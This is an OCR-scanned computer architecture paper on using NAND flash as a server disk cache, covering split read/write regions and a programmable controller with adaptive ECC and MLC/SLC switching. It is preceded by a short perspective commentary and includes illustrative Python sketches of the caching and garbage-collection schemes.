On the other hand, flash memory still suffers from two principal weaknesses: reliability and cost relative to capacity. Thus, a system architect is tempted to combine traditional RAM and traditional disk drives with flash memory. The RAM provides write endurance by absorbing the data traffic coming from the CPU caches; omitting RAM in a system architecture and backing up CPU caches with flash memory would lead to very unreliable or expensive computing systems. The traditional disk drives provide cost-efficient storage capacity; many studies have shown that a large fraction of any data collection is rarely accessed after a short initial period of creation and repeated activity. In fact, disk hardware could be divided into capacity-optimized drives, often targeted at consumers, and performance-optimized drives, often targeted at enterprises. Multi-disk strategies could be similarly divided, with RAID-5 and -6 optimized for minimal overhead, minimal power, and maximal capacity and with RAID-1 optimized for performance.

In discussions and designs, flash memory is placed between RAM and disks. Thus, the traditional two-level memory hierarchy (ignoring CPU caches and archival tapes) becomes a three-level hierarchy. For most applications, rewriting the source code to accommodate a deeper memory hierarchy does not make sense. Thus, the flash memory must be integrated in such a way that its presence is hidden except for the performance or cost advantage. One exception may be database management systems, which manage very large data volumes and are thus constantly being updated to take the best advantage of available hardware. For example, researchers and vendors are investigating challenges and opportunities due to deep CPU caches, many-core processors, transactional memory, and flash memory.
Roberts, Kgil, and Mudge represent a perspective that assumes no change in application software, meaning all adaptations for deep memory hierarchy and for flash memory are in the lower levels of system software. Multiple interesting and promising techniques are explored, for example, increasing reliability of multi-level flash memory by using individual pages in single-level mode rather than immediately declaring them bad blocks. This novel technique for graceful degradation of flash memory capacity, if widely adopted in future implementations of the flash translation layer, could greatly increase reliability and cost effectiveness, and speed the adoption of flash memory in all kinds of servers. The race is on among techniques that give flash memory the required reliability and endurance; candidates include over-provisioning, hardware techniques such as those presented here, and software techniques such as a flash translation layer akin to a log-structured file system.
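The graceful-degradation idea can be illustrated with a toy Python policy. This is a hypothetical sketch, not the controller proposed by Roberts, Kgil, and Mudge. It assumes a fixed ECC limit of 8 correctable bit errors per page, pages of 4096 cells, and multi-level cells that store 2 bits. When a page in MLC mode exceeds the limit, it is switched to single-level mode (halving its capacity) and is retired only if it fails again.

```python
from dataclasses import dataclass

ECC_LIMIT = 8  # hypothetical: bit errors per page that the ECC can correct


@dataclass
class FlashPage:
    cells: int = 4096
    bits_per_cell: int = 2  # start in multi-level cell (MLC) mode
    retired: bool = False

    @property
    def capacity_bits(self) -> int:
        return 0 if self.retired else self.cells * self.bits_per_cell


def handle_read_errors(page: FlashPage, bit_errors: int) -> None:
    """Degrade gracefully: fall back to single-level mode before retiring."""
    if page.retired or bit_errors <= ECC_LIMIT:
        return                   # nothing to do, or the errors are correctable
    if page.bits_per_cell > 1:
        page.bits_per_cell = 1   # single-level (SLC) mode: half the capacity
    else:
        page.retired = True      # already SLC and still failing: a bad page


page = FlashPage()
handle_read_errors(page, 3)    # correctable: stays in MLC mode
handle_read_errors(page, 12)   # too many errors: switch to SLC
print(page.bits_per_cell, page.capacity_bits)  # 1 4096
handle_read_errors(page, 12)   # fails again: retire
print(page.retired, page.capacity_bits)        # True 0
```

A real flash translation layer would also have to migrate the page's data and track wear; the sketch shows only the mode decision.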

The authors introduce and compare three basic architectures of using flash memory in the memory hierarchy: as "extended system memory," as "storage accelerator," and as "alternative storage device." This characterization resonates with earlier work on the Five-Minute Rule and flash memory (ACM Queue 2008). The authors tie these usage models to hardware interfaces, namely memory, PCI, and disk interfaces such as SATA. After reviewing these approaches, the authors synthesize a proposed architecture for a flash-based disk cache. The proposed memory controller partitions the flash memory into separate regions for reading and writing in order to accommodate the need to erase large blocks prior to writing. Future improvements, for example, adaptation of generational garbage collection as proposed for log-structured file systems, will likely build on this foundation. The proposed "flash cache hash table," held in RAM, permits efficient mapping of pages to locations in flash memory; one wonders whether this function could be integrated in the virtual memory management already ubiquitous in operating systems.
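The read/write partitioning and the RAM-resident mapping table can be pictured with a toy Python class. This is a hypothetical sketch rather than the authors' design. It assumes integer page numbers, a direct-mapped read region, and a write region that is filled append-only and then flushed to disk and erased as a whole, standing in for the large-block erase that flash requires. The `table` dictionary plays the role of the flash cache hash table.

```python
class FlashCache:
    """Toy flash-based disk cache with separate read and write regions.

    A RAM-resident dict maps each cached disk page to its location in flash,
    ("read", slot) or ("write", slot). Writes never overwrite flash in place.
    """

    def __init__(self, read_slots: int, write_slots: int):
        self.table = {}                         # disk page -> (region, slot), held in RAM
        self.read_region = [None] * read_slots  # each slot holds (page, data) or None
        self.write_region = []                  # append-only log of (page, data)
        self.write_slots = write_slots
        self.disk = {}                          # stand-in for the backing disk

    def lookup(self, page: int):
        """Return cached data for `page`, or None on a miss."""
        loc = self.table.get(page)
        if loc is None:
            return None
        region, slot = loc
        entry = self.read_region[slot] if region == "read" else self.write_region[slot]
        return entry[1]

    def fill(self, page: int, data) -> None:
        """Cache a clean page just read from disk after a miss (read region)."""
        slot = page % len(self.read_region)     # direct-mapped placement
        old = self.read_region[slot]
        if old is not None and self.table.get(old[0]) == ("read", slot):
            del self.table[old[0]]              # evict the previous occupant
        self.read_region[slot] = (page, data)
        self.table[page] = ("read", slot)

    def write(self, page: int, data) -> None:
        """Append a dirty page to the write region, erasing it first if full."""
        if len(self.write_region) == self.write_slots:
            self._flush_and_erase()
        self.write_region.append((page, data))
        self.table[page] = ("write", len(self.write_region) - 1)

    def _flush_and_erase(self) -> None:
        """Write back live pages, then erase the whole write region at once."""
        for slot, (page, data) in enumerate(self.write_region):
            if self.table.get(page) == ("write", slot):
                self.disk[page] = data
                del self.table[page]
        self.write_region = []


cache = FlashCache(read_slots=4, write_slots=2)
cache.fill(1, "a")
cache.write(1, "b")     # the newer copy lives in the write region
print(cache.lookup(1))  # b
```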

The authors present results of a de- 
tailed simulation study of their pro- 
posed architecture using a full-system 
simulator. Rather than simply add flash 
to a system including traditional RAM 
and traditional disks, they reduce RAM 
for equal die area before comparing the 
RAM-and-flash system with the tradi- 
tional RAM-only system. Equal power 
consumption could be an alternative 
metric but is left for future study. Similarly,
secondary software effects are omitted, for example, faster access times
leading to shorter delays due to virtual 
memory faults or misses in the buffer 
pools of file system or database server, 
such that a lower multi-programming 
level can mask all those delays, which 
in turn reduces memory contention and 
thus the RAM required in the system. 

Nonetheless, the results demonstrate 
that with flash memory in a memory hi- 
erarchy, less power and cooling can still 
result in higher processing bandwidth, 
and that the proposed programmable 
controller for flash memory can extend 
the expected lifetime for a given access 
rate. With those results, the proposed 
techniques represent a step toward 
more efficient storage, servers, and data 
centers, reducing costs for data center 
operation and environmental emissions.


Goetz Graefe (goetz.graefe@hp.com) is an HP Fellow and 
member of the Advanced Database Group at Hewlett- 
Packard Laboratories. 
Integrating NAND Flash Devices onto Servers

By David Roberts, Taeho Kgil, and Trevor Mudge


Abstract 

Flash is a widely used storage device in portable mobile 
devices such as smart phones, digital cameras, and MP3 play- 
ers. It provides high density and low power, properties that 
are appealing for other computing domains. In this paper, 
we examine its use in the server domain. Wear-out has the 
potential to limit the use of Flash in this domain. To seriously 
consider Flash in the server domain, architectural support 
must exist to address this lack of reliability. This paper first 
provides a survey of current and potential Flash usage models 
in a data center. We then advocate using Flash as an extended
system memory usage model (an OS-managed disk cache) and
describe the necessary architectural changes. Specifically, we
propose two key changes. The first improves performance
and reliability by splitting Flash-based disk caches into sepa-
rate read and write regions. The second improves reliability
by employing a programmable Flash memory controller. It
changes the error correction code strength (number of cor-
rectable bits) and the number of bits that a memory cell can
store (cell density) in response to the demands of the application.


1. INTRODUCTION 
Data centers are an integral part of today’s computing platforms.
As cloud computing initiatives provide IT capabilities
that incorporate software as a service, they require internet service
providers such as Google and Yahoo to build large-scale data
centers hosting millions of servers. Energy efficiency becomes
a first-class citizen to address the increasing cost of operat- 
ing a data center. Data centers based on off-the-shelf general- 
purpose processors are unnecessarily power hungry, require 
expensive cooling systems, and occupy a large space. In fact, 
the cost of powering and cooling these data centers accounts for
a significant portion of the operating cost. Figure 1 breaks down
the annual operating cost for data centers. It clearly shows that 
the cost of power and cooling servers increasingly contributes 
to the overall operating costs of a data center. 

System memory power (DRAM power) and disk power 
contribute as much as 50% to the overall power consump- 
tion in a data center. Further, current trends suggest that 
this percentage will continue to increase at a rapid rate as 
we integrate more memory modules (DRAM) and disk drives 
to improve throughput. 


Fortunately, there are emerging memory devices in the
technology pipeline that may address this concern. These
devices typically display high density and consume low idle
power. Flash, Phase Change RAM (PCRAM) and Magnetic
RAM (MRAM) are examples.
In particular, Flash is an attractive technology that is 
already deployed heavily in various computing platforms. 
VOL, 52 NO. 4 
Today, NAND Flash can be found in handheld devices such
as smart phones, digital cameras, and MP3 players. This
has been made possible by its high density and low
power properties. These result from the simple structure of
Flash cells and their nonvolatility. Its popularity has made
it the focus of aggressive process scaling and innovation.

The rapid rate of improvement in density has become the 
primary driver to consider Flash in other usage models. There 
are several Flash usage models in the data center that are cur- 
rently being examined by industry and academia that address 
rising power and cooling costs, among other things. Two common
usage models are disk caches and storage devices. Some
efforts have led to product development,* '° while others have
influenced storage and memory device standards.'*'°

This paper provides an overview of the benefits of inte- 
grating Flash onto a server. Specifically, in this paper: 


1. We provide an analysis of current and potential Flash 
usage models for servers. 

2. We argue that the extended system memory model" is 
the best usage model to reduce data center energy when 
the contribution of system memory power exceeds the 
contribution of disk power. 

3. We review two architectural modifications to improve 
NAND-based disk caches.'! First, we show that by split- 
ting Flash-based disk caches into read and write regions, 
overall performance and reliability can be improved. 
Second, we show that a programmable Flash memory
controller can improve Flash cell reliability and extend
memory lifetime. The first programmable parameter is
error correction code (ECC) strength. The second is the
Flash cell density, which can change from multilevel cells
(MLC) to single-level cells (SLC).

Figure 1: IDC estimates for annual cost spent on powering and cooling servers and purchasing new servers.

A previous version of this paper, entitled “Improving NAND
Flash-based Disk Caches,” was published in Proceedings
of the International Symposium on Computer Architecture
(ISCA 2008).


2. BACKGROUND 


2.1. Properties of a NAND Flash device 

Flash memory is a nonvolatile memory device that can be elec- 
trically read, written, and erased. Flash memory cells in NAND 
Flash are connected in series to maximize cell density. Further, 
to improve Flash density, each Flash memory cell can use mul- 
tiple threshold voltage levels to store more than one bit per 
cell. NAND Flash supporting MLC is called MLC NAND Flash. 
NAND Flash using a single threshold voltage level (technically
two levels) is called SLC NAND Flash. Cutting-edge MLC NAND
Flash supports 4 bits per cell. There are significant differences
in the access time and lifetime of the two types. Although MLC
Flash is cheaper and its bit density is higher relative to SLC, MLC
is slower to read and write and has a shorter lifetime by a factor
of 10 or more. Typical latencies for read, write, and erase are
25 µs, 250 µs, and 0.5 ms for SLC and 50 µs, 900 µs, and 3.5 ms
for 2-bit MLC. The gap in performance and lifetime between the
two types widens as the number of bits per Flash cell increases.
This may be perfectly acceptable for some applications; for 
example, a tune in an MP3 player may only be replaced every 
few days. A disk cache, however, may have all of its locations re- 
written several times a day depending on the amount of disk 
traffic and size of the cache. 

NAND Flash is organized in units of pages and blocks. A typi- 
cal Flash page is 2KB in size and a Flash block is made up of 64 
Flash pages (128KB). Random Flash reads and writes are performed
on a page basis and Flash erasures are performed per
block. A Flash device must erase a block before it can
write to a page belonging to that block, and each subsequent
write to that page must be preceded by another erase. Therefore
out-of-place writes are commonly used to mitigate wear-out.
These writes append new data to the end of a log while old
data pages are invalidated.
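The out-of-place write scheme can be sketched as a log-structured page map. This is a minimal illustration assuming the typical geometry quoted above (2KB pages, 64 pages per block); the class and method names are hypothetical, and garbage collection is deliberately omitted, so the sketch simply refuses writes once the log is full.

```python
PAGE_SIZE = 2048          # bytes per Flash page (typical value from the text)
PAGES_PER_BLOCK = 64      # pages per erase block, i.e. 128KB blocks


class OutOfPlaceLog:
    """Hypothetical log-structured map from logical to physical pages."""

    def __init__(self, num_blocks: int) -> None:
        self.num_pages = num_blocks * PAGES_PER_BLOCK
        self.mapping: dict[int, int] = {}    # logical page -> physical page
        self.valid = [False] * self.num_pages
        self.head = 0                        # next erased page at the log end

    def write(self, logical_page: int) -> int:
        """Append new data at the log head and invalidate any old copy."""
        if self.head >= self.num_pages:
            raise RuntimeError("log full: garbage collection would be needed")
        old = self.mapping.get(logical_page)
        if old is not None:
            self.valid[old] = False          # old copy becomes an invalid page
        physical = self.head
        self.valid[physical] = True
        self.mapping[logical_page] = physical
        self.head += 1
        return physical
```

Rewriting logical page 7 never touches its old physical page; the old page is only marked invalid and must later be reclaimed by erasing its whole block.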


NAND Flash can also be dynamically configured to support
multiple Flash memory cell types for each page or
block. In fact, such devices are now commercially available, 
e.g., Samsung’s Flex-OneNAND.° Figure 2(a) illustrates the 
organization of an SLC/MLC dual-mode device. Pages in 
SLC mode consist of 2048 bytes of data area and 64 bytes of 
“spare” data for ECC bits. When in MLC mode, an SLC page 
can be split into two 2048 byte MLC pages. Pages are erased 
together in blocks of 64 SLC pages or 128 MLC pages. 
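The capacity cost of the dual-mode organization is easy to quantify. The sketch below, assuming the 2048-byte data area and the block sizes given above plus the 2-bit MLC latencies quoted earlier in this section, computes how much data one erase block holds in each mode; the `MODES` table layout is our own illustration.

```python
DATA_BYTES_PER_PAGE = 2048   # data area per page in either mode

# mode -> (pages per erase block, read us, write us, erase ms), using the
# typical SLC and 2-bit MLC latencies quoted in Section 2.1.
MODES = {
    "SLC": (64, 25, 250, 0.5),
    "MLC": (128, 50, 900, 3.5),
}


def block_capacity_bytes(mode: str) -> int:
    """Data bytes stored by one erase block in the given mode."""
    pages_per_block = MODES[mode][0]
    return pages_per_block * DATA_BYTES_PER_PAGE
```

An SLC block holds 128KB and an MLC block 256KB, so switching a block from MLC to SLC halves its capacity in exchange for roughly half the read latency and a longer lifetime.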

When the number of faulty bits per block exceeds the capa- 
bilities of an ECC, blocks are disabled, reducing the capacity 
of the memory. This is an instance of wear-out affecting system 
performance over time, especially for file cache applications.

MLC Flash ages more quickly than SLC Flash. MLC Flash
supports fewer reliable write/erase (W/E) cycles due to the
smaller threshold voltage margins between bit values. New
Flash architectures® can circumvent this problem by switching
from high-density MLC to lower density or even single-level
mode to counter wear-out. No policy currently exists to
perform the mode selection, so we propose a mechanism for
changing mode, tailored to a disk caching application.

Figure 2: (a) Example dual-mode SLC/MLC Flash bank organization and (b) time spent in garbage collection as a function of the Flash space in use.
Because Flash blocks have a limited number of erases 
before they develop faulty bits, a wear-leveling algorithm 
attempts to equalize the number of erases performed on 
each block.’ This has to be achieved without performing 
more erases than necessary. The simplest method of wear- 
leveling is to treat the device as a circular log. New data is 
written to the next available page and the old page is invali- 
dated. However, wear-leveling causes fragmentation prob- 
lems. Fragmentation is addressed with garbage collection. 
The process of garbage collection reads valid pages from 
erase blocks containing some invalid pages, then writes 
them to a previously erased block.’ Garbage collections free 
up pages that are ready to write new data. This process takes 
time and increases the amount of wear in the Flash blocks. 
The overhead in garbage collection increases as less 
free space is available on Flash. This becomes a significant 
problem, because garbage collection generates extra writes
and erases in Flash, reducing performance and endurance as 
the occupancy of the Flash increases. Figure 2(b) shows how 
the time spent garbage collecting increases as more Flash 
space is used. It is normalized to an overhead of 10% and is 
for a 2GB Flash memory. It can be seen that garbage collec- 
tion becomes overwhelming well before all of the memory is 
used. 
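Garbage collection and its growing cost can be sketched together. This is a simplified illustration, not the authors' algorithm: it assumes a greedy victim policy (reclaim the block with the fewest valid pages, breaking ties toward the less-worn block as a nod to wear-leveling) and represents each block as a list of page states. The `gc_write_amplification` function is a standard back-of-the-envelope model, also our assumption rather than the measurement behind Figure 2(b): if a reclaimed block is still a fraction u valid, freeing its (1 - u) invalid pages costs copying u pages, so each page of new data costs about 1/(1 - u) physical writes.

```python
from dataclasses import dataclass

VALID, INVALID, FREE = "V", "I", "F"


@dataclass(eq=False)          # compare blocks by identity, not by contents
class Block:
    pages: list[str]
    erase_count: int = 0


@dataclass
class GCStats:
    page_reads: int = 0
    page_writes: int = 0
    erases: int = 0


def collect_one(blocks: list[Block], spare: Block, stats: GCStats) -> Block:
    """One greedy GC step. `spare` must already be erased. Valid pages of the
    victim are copied into `spare`, which takes the victim's place; the
    erased victim is returned to serve as the next spare block."""
    candidates = [b for b in blocks if INVALID in b.pages]
    if not candidates:
        raise ValueError("no block contains invalid pages")
    # Fewest valid pages first (least copying); ties go to the least-worn block.
    victim = min(candidates, key=lambda b: (b.pages.count(VALID), b.erase_count))
    idx = next(i for i, b in enumerate(blocks) if b is victim)
    survivors = victim.pages.count(VALID)
    stats.page_reads += survivors
    stats.page_writes += survivors
    # Valid data is rewritten sequentially at the start of the spare block.
    spare.pages = [VALID] * survivors + [FREE] * (len(spare.pages) - survivors)
    victim.pages = [FREE] * len(victim.pages)   # erase the victim
    victim.erase_count += 1
    stats.erases += 1
    blocks[idx] = spare
    return victim


def gc_write_amplification(utilization: float) -> float:
    """Physical writes per host write if every reclaimed block is still a
    fraction `utilization` valid (simple uniform-occupancy model)."""
    if not 0.0 <= utilization < 1.0:
        raise ValueError("utilization must be in [0, 1)")
    return 1.0 / (1.0 - utilization)
```

Under this model, blocks that are still 50% valid double the write traffic, while blocks that are 90% valid multiply it by ten, which is why the overhead rises steeply well before the Flash is full.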


2.2. NAND Flash usage models in a server 
Industry and researchers in academia are making strides to 
integrate Flash into the data center. Industry has recently
released several Flash-based products and Flash standards 
targeted for servers, while researchers in academia have 
recently published several papers proposing techniques for 
integrating emerging memory technologies including Flash. 
NAND Flash usage models pursued by industry and aca- 
demia can be categorized as follows: 


1. Extended system memory usage model: A NAND Flash 
memory module is connected to the current system 
memory interface or to a dedicated Flash memory 
interface. 

2. Storage accelerator usage model: A NAND Flash PCI
express card is connected to the PCI express interface.

3. Alternative storage device usage model: A Solid State
Drive (SSD) replaces or augments the hard disk drive. It
is connected to the disk interface. An example would
be a SATA SSD.


Each usage model presents a unique set of benefits
and challenges. Table 1 qualitatively captures them. The
“extended system memory” usage model presents Flash
as a part of the system memory. It addresses the rising
contribution of power consumed by DRAM in addition to the
electrical constraints limiting the integration of more system
memory. For example, to increase storage capacity without
having to reduce the operating frequency of the memory
channel, MetaRAM" packs more DRAM onto each DIMM.
Using denser memory such as Flash may serve a similar
purpose. However, this usage model requires modification
to the operating system kernel. Specifically, the kernel memory
manager's current support for nonuniform memory architectures
needs to be made aware of the unique organization and
behavior of Flash. Flash reliability management can be
performed by the kernel memory manager with the assistance
of the Flash controller.

The “storage accelerator” usage model presents Flash
as a PCI express device that can be directly managed by the
user application. This usage model allows the server
application to manage Flash directly as a cache that stores
frequently accessed code and data. It reduces the number of
accesses to the hard disk drive, thereby reducing overall disk
power. Further, it may also be used as a way to implement
the “extended system memory” usage model, but with several
drawbacks such as higher latency, lower throughput, and
added complexity in managing Flash. Flash management is
distributed across the user application, the device driver stack,
and the Flash PCI express card firmware. To truly leverage Flash
as a “storage accelerator,” the user application should be Flash
aware. A device driver stack needs to be implemented to
support the PCI express device, and it must provide device
sharing mechanisms so that other concurrent user applications
and kernel components can use the device simultaneously.
With its Solid State Storage,’ Fusion-io has also shown that the
“storage accelerator” usage model can expose the Flash PCI
express device as an SSD by providing disk emulation features
in the device driver stack.

The “alternative storage device” usage model presents
Flash as an SSD that replaces a hard disk drive.'® This usage
model improves the latency and throughput to disk and
reduces overall disk power consumption in a data center.
With appropriate filesystems such as ZFS,'° it improves
storage device scalability in a data center. Industry has heavily
adopted this usage model and has recently released several
products.*° These solid state drives are used to implement
a storage area network (SAN) or network attached storage
(NAS) in a data center. They employ reliability features such
as RAID, as commonly found in hard disk drive based SANs
and NASs. Flash reliability management is performed by
the Flash device controller in the SAN or NAS. However, this
usage model also requires modification in the kernel, and a
complex Flash device controller that is capable of performing
intelligent Flash reliability management. A customized
filesystem needs to be implemented to fully take advantage of
the benefits of Flash."* '° Further, this usage model ties itself
to the non-Flash-aware features found in a hard disk
drive interface protocol such as SATA. For example, the device
driver can only communicate with the disk using SATA commands
that were not defined with Flash in mind. On the other hand,
the operating system in the “extended system memory” model
has full visibility of memory page classification and activity
statistics that can be used for more intelligent mapping of
data to Flash.


Table 1: Comparison of Flash usage models in a server.

Usage model | Primary power savings | Secondary power savings | Hardware complexity | OS kernel modification | Application modification | Comments
Extended system memory | DRAM | Disk | Minimal | Medium | None | Extend kernel memory manager to manage Flash devices
I/O accelerator | Disk | DRAM | Medium | Medium | Yes | Need to build I/O accelerator driver stack
Alternative storage device | Disk | DRAM | High | Minimal | None | Need to implement filesystem for Flash
Servers clearly benefit from all three usage models that
essentially integrate Flash as a faster hard disk or disk cache. All 
usage models help (1) reduce unnecessary standby power from 
hard disk drives and (2) improve overall throughput by reading 
and writing from disk cache instead of a hard disk drive. 

In the remainder of this paper, we examine Flash-based 
disk cache architectures that improve Flash manageability 
and reliability in the extended system memory usage model. 
We believe this usage model is effective in addressing the 
increasing power consumption in system memory. Our stud- 
ies on servers have revealed the system memory architecture 
to be the critical component in delivering high throughput 
in a data center.’° 


3. PROPOSED ARCHITECTURE 


3.1. Architecture of the Flash-based disk cache 

The right side of Figure 3 shows the Flash-based disk cache 
architecture for the extended system memory usage model. 
Compared to a conventional DRAM-only architecture shown 
on the left side of Figure 3, our proposed architecture uses a 
two-level disk cache, composed of a relatively small DRAM in
front of a dense Flash. The much lower access time of DRAM 
allows it to act as a cache for the Flash without significantly 
increasing power consumption. A Flash memory controller 
is also required for reliability management. 

Our design uses a NAND Flash that stores 2 bits per cell 
(MLC) and is capable of switching from MLC to SLC mode 
using techniques proposed in Flex-OneNAND® and Cho.’ 
Finally, our design uses variable-strength ECC to improve 
reliability while adding the smallest possible delay. 


Figure 3: 1GB DRAM is replaced with a smaller 256 MB DRAM and 
1GB NAND-based Flash. Additional components are added to control 
Flash. 
Operating System Support: Our proposed architecture
requires additional data structures to manage the Flash 
blocks and pages. These tables are read from the hard disk 
drive and stored in DRAM at run-time to reduce access 
latency and mitigate wear-out. Together, they describe 
whether pages exist in DRAM or Flash, and specify the vari- 
ous Flash memory configuration options for reliability. For 
example, the FlashCache Hash Table allows the operating 
system to quickly look up the location of a file page. The 
Flash Page Status Table keeps track of the ECC strength, 
MLC/SLC mode and access frequency for each page. Each 
erase block has an entry in the Block Status Table to determine
how worn out it is. Finally, the Global Status Table
records how quickly the Flash-based disk cache is satisfying
requests, which is the number we try to maximize while the
system is running.
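The four tables can be pictured as simple in-memory structures. The Python sketch below only illustrates what each table records according to the description above; the field names, the types, and the use of a hit rate as the Global Status Table metric are hypothetical choices, not the authors' layout.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class PageStatus:            # one Flash Page Status Table (FPST) entry
    ecc_strength: int = 1    # correctable bits configured for the page
    slc_mode: bool = False   # False = MLC, True = SLC
    read_count: int = 0      # access frequency
    valid: bool = False


@dataclass
class BlockStatus:           # one Block Status Table entry per erase block
    erase_count: int = 0     # how worn out the block is
    retired: bool = False


@dataclass
class GlobalStatus:          # Global Status Table: how well the cache performs
    hits: int = 0
    lookups: int = 0

    def hit_rate(self) -> float:
        return self.hits / self.lookups if self.lookups else 0.0


@dataclass
class FlashCacheTables:
    # FlashCache Hash Table: (file id, page within file) -> Flash page number
    hash_table: dict[tuple[int, int], int] = field(default_factory=dict)
    page_status: list[PageStatus] = field(default_factory=list)
    block_status: list[BlockStatus] = field(default_factory=list)
    global_status: GlobalStatus = field(default_factory=GlobalStatus)

    def lookup(self, file_id: int, file_page: int) -> Optional[int]:
        """Return the Flash page holding a file page, or None on a miss."""
        self.global_status.lookups += 1
        flash_page = self.hash_table.get((file_id, file_page))
        if flash_page is not None:
            self.global_status.hits += 1
            self.page_status[flash_page].read_count += 1
        return flash_page
```

Only the hash table and the page status table need one entry per Flash page, which matches the observation that these two dominate the storage overhead.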

The storage overhead of the four tables is less than 2%
of the Flash size. The FlashCache Hash Table and Flash Page 
Status Table are the primary contributors because an entry 
is needed for each Flash page. Our Flash-based disk cache 
is managed in software (OS code) using the tables described 
above. We found the performance overhead in executing 
this code to be minimal. 
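To make the 2% bound concrete, the arithmetic below applies it to the 1GB Flash of Figure 3 with 2KB pages. The calculation is ours and only restates the stated bound; the actual entry sizes are not given in the text.

```python
FLASH_BYTES = 1 << 30        # 1GB Flash (Figure 3)
PAGE_BYTES = 2 * 1024        # 2KB Flash page
OVERHEAD_FRACTION = 0.02     # stated upper bound on table storage

num_pages = FLASH_BYTES // PAGE_BYTES            # entries in the per-page tables
table_budget = FLASH_BYTES * OVERHEAD_FRACTION   # bytes available for all tables
bytes_per_page_entry = table_budget / num_pages  # budget per Flash page

print(num_pages, round(table_budget / 2**20, 2), round(bytes_per_page_entry, 2))
```

The bound allows about 20.5MB of tables for 524,288 pages, or roughly 41 bytes per page, and that space is consumed in DRAM, where the tables are kept at run time.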

Splitting Flash into Read and Write Regions: We divide 
the Flash into a read disk cache and a write disk cache. Read 
caches are less susceptible to out-of-place writes, which 
reduce the read cache capacity and increase the risk of gar- 
bage collection. An out-of-place write happens when existing 
data is modified, because Flash has to be erased before it 
can be written to a second time. It is simple to invalidate the 
old data page (using the Page Status Table and modifying 
the Hash Table) then write new data into a previously erased 
page. However, the invalid pages accumulate as wasted 
space that will have to be garbage collected later. By splitting 
Flash into read and write regions, we were able to cut down on
time-consuming garbage collections.


Figure 4 shows an example that highlights the benefits 
of splitting the Flash-based disk cache into a read and write 
cache. The left side shows the behavior of a unified Flash- 
based disk cache and the right side shows the behavior of 
splitting the Flash-based disk cache into a read and write 
cache. Figure 4 assumes we have five pages per block and 
five total blocks in a Flash-based disk cache. Garbage collec- 
tion proceeds by reading all valid data from blocks contain- 
ing invalid pages, erasing those blocks and then sequentially 
re-writing the valid data. In this example, when the Flash- 
based disk cache is split into a read and write cache, only two 
blocks are candidates for garbage collection. This dramati- 
cally reduces Flash reads, writes, and erases compared to a 
unified Flash-based disk cache that considers all five Flash 
blocks. Our studies also show that the overall disk cache 
miss rate is reduced substantially for online transaction pro- 
cessing (OLTP) applications by splitting the Flash. 
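The counts reported in Figure 4 follow directly from the garbage collection procedure just described. The sketch below counts page reads, page writes, and block erases for one hypothetical layout (five blocks of five pages, five invalid pages in total) that we chose to be consistent with the totals in the figure; it is not the exact layout drawn there.

```python
def gc_cost(blocks: list[str]) -> tuple[int, int, int]:
    """Count (page reads, page writes, block erases) needed to reclaim every
    block that contains invalid pages. Each block is a string of page
    states: 'V' valid, 'I' invalid."""
    reads = writes = erases = 0
    for block in blocks:
        if "I" in block:
            valid = block.count("V")
            reads += valid    # read the surviving data
            writes += valid   # rewrite it sequentially elsewhere
            erases += 1       # erase the whole block
    return reads, writes, erases


# Unified cache: invalid pages scattered, one per block.
unified = ["VVVVI", "VVVIV", "VVIVV", "VIVVV", "IVVVV"]
# Split cache: the same five invalid pages clustered in two write-cache
# blocks, while the three read-cache blocks hold only valid data.
split = ["VVVVV", "VVVVV", "VVVVV", "IIIIV", "IVVVV"]

print(gc_cost(unified))
print(gc_cost(split))
```

Both layouts hold 20 valid pages, yet the unified layout needs five erases and 20 page copies while the split layout needs two erases and five copies, because only the blocks that actually contain invalid pages are garbage collected.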


3.2. Architecture of the Flash memory controller 

Flash needs architectural support to improve reliability and
lifetime when used as a cache. Figure 6 shows a high-level
block diagram of a programmable Flash memory controller
that addresses this need. Requests from the operating system
provide the address being accessed and any data to be written.
In addition, the OS specifies the strength of ECC and whether
the page is in MLC or SLC mode. The controller returns any
data that was read along with information concerning the
number of errors currently being corrected by the ECC logic.

Figure 4: Example showing the benefits of splitting the Flash-based disk cache into Read and Write caches. In the five erase blocks, pages of data that have been evicted from the cache and invalidated are grayed out. On the left, a unified cache allows pages that are heavily read and written to be placed in any erase block. This results in scattered invalid pages. Our split read/write cache forces read- and write-dominated data into two separate sets of erase blocks. As a result, invalid pages are clustered and fewer blocks have to be erased to prepare the invalid pages for another write. (Panels: unified cache, and split read cache and write cache, each before and after garbage collection; legend: occupied valid Flash page, invalid Flash page. Unified cache: 5 Flash block erases, 20 Flash page writes, 20 Flash page reads. Split cache: 2 Flash block erases, 5 Flash page writes.)
Our architecture uses a BCH encoder and decoder to per- 
form error correction and a CRC checker to perform error 
detection. The BCH code guarantees that up to a configured number
of faulty bits can be corrected. However, as the number of faulty
bits increases, it takes longer to perform the correction. Doubling
the number of correctable bits approximately doubles the
time needed to decode the data and extract the correct value.
Our system adapts the ECC strength to the appropriate number
of faulty bits in each page to achieve graceful Flash wear-out.
The relationship between the number of correctable bits
and erase count is shown in Figure 5. It shows that stronger
ECC effectively improves page lifetime. The different lines
on the graph show the effects of different levels of variability
in the likelihood of bits being faulty. As the standard deviation
increases, the number of tolerated erases decreases
for any particular error correction strength. This shows that
process variability has a negative impact on lifetime and
requires more bits to be corrected for the same lifetime. As
process technology advances and cells become smaller, the
effect of variability will become even more pronounced.
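The ECC trade-off above (more correctable bits, proportionally longer decoding) suggests a simple selection rule. The sketch below picks the weakest code strength that covers the faulty bits already observed in a page plus a safety margin, and models decode time as linear in strength, following the doubling observation in the text. The strength limit, the margin, and the per-bit decode cost are hypothetical parameters, and no actual BCH encoding or decoding is performed.

```python
from typing import Optional

MAX_ECC_STRENGTH = 12      # hypothetical limit on correctable bits per page
DECODE_US_PER_BIT = 0.5    # hypothetical decode cost per correctable bit


def choose_ecc_strength(faulty_bits: int, margin: int = 1) -> Optional[int]:
    """Weakest strength that corrects the known faulty bits plus `margin`
    new ones; None means ECC alone can no longer protect the page."""
    needed = max(1, faulty_bits + margin)
    return needed if needed <= MAX_ECC_STRENGTH else None


def decode_latency_us(strength: int) -> float:
    """Decode time modeled as linear in strength: doubling it doubles latency."""
    return DECODE_US_PER_BIT * strength
```

A `None` result corresponds to the point where a page must fall back to SLC mode or be retired, which is the case handled by the reconfiguration policy in Section 3.3.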
Our programmable Flash memory controller also dynamically
controls the density of a Flash page. Density control
benefits Flash performance and endurance, because we are
able to reduce access latency for frequently accessed pages
and possibly improve endurance for aging Flash pages by
changing MLC pages to SLC pages as needed. To show the
potential improvement of Flash performance by controlling
density, we present a study using real disk traces.

Figure 5: Maximum tolerable Flash Write/Erase cycles for varying code strength.

